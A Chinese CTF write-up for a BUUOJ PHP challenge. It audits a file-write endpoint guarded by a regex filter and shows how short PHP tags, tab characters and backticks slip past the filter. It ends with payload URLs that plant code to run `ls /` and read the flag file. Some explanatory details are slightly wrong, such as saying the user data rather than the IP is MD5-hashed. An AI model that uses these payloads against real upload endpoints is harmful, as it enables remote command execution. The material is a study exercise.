进入环境,首先进行代码审计
代码审计
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
// if(preg_match("/'| |_|=|php/",$input)){
die('hacker!!!');
}else{
return $input;
}
}
function waf($input){
if(is_array($input)){
foreach($input as $key=>$output){
//遍历数组
$input[$key] = waf($output);
}
}else{
$input = check($input);
}
}
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
mkdir($dir); //创建文件夹
}
switch($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
waf($data);
file_put_contents("$dir" . "index.php", $data);
// file_put_contents()
}
?>
file_put_contents()
file 必需。规定要写入数据的文件。如果文件不存在,则创建一个新文件。
data 必需。规定要写入文件的数据。可以是字符串、数组或数据流。
mode 可选。规定如何打开/写入文件。
先了解下 ??的作用
switch($_GET["action"] ?? "")
?? 判断一个变量是否存在 ,存在则赋值变量本身,不存在赋值另一变量
?? 相当于:isset($a)? $a :$b;
是php7 推出来的
可以简单理解为 用于简便三元表达式
eg:
$a = $a ?? 1;
var_dump($a);//1
$a = 50
$a = $a ?? 1;
var_dump($a);//0
先看下面的代码:
switch($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
waf($data);
file_put_contents("$dir" . "index.php", $data);
// file_put_contents()
}
判断get传参(action)是否存在
当action = pwd 就会输出 dir
当action = upload 会检测我们的data是否存在 并对data进行一个过滤,并且作为 file_put_contents()的第三个参数
function check($input){
if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
// if(preg_match("/'| |_|=|php/",$input)){
die('hacker!!!');
}else{
return $input;
}
}
function waf($input){
if(is_array($input)){
foreach($input as $key=>$output){
//遍历数组
$input[$key] = waf($output);
}
}else{
$input = check($input);
}
}
发现对data参数进行过滤(包括 php eval 等),这里就在提示我们使用 php标签
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
mkdir($dir); //创建文件夹
同时 我们输入的 data 进行MD5加密,在与sandbox进行结合
在生成新的文件加存放 $dir
所以,在本题我们的思路是:
先切换到 upload模式 传入数据参数 ,将数据存放到新文件夹
然后切换到 pwd模式 获得 MD5 加密后的dir
直接输入获得的密码 (查询以dir命名的文件夹)即可获得我们查询的内容
还有一个问题就是 本关的敏感次过滤问题
正则匹配绕过
本关用到的短标签:
<?="1"?> //相当于<?php echo "1";?>
<?echo"1"?>
<% echo"1";%> //此标签有的版本行不通x
空格过滤饶过
%09 < > <> $IFS$9 ${IFS}
单引号 包裹可以使用 ` 代替
echo `你好`
payload绕过
先访问:
http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=upload&data=<?echo%09`ls%09/`?>
再访问:
http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=pwd
再直接访问
http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/sandbox/c47b21fcf8f0bc8b3920541abd8024fd/
再访问 flag
http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=upload&data=%3C?echo%09`cat%09/flllllll1112222222lag`?%3E
http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=pwd
http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/sandbox/c47b21fcf8f0bc8b3920541abd8024fd/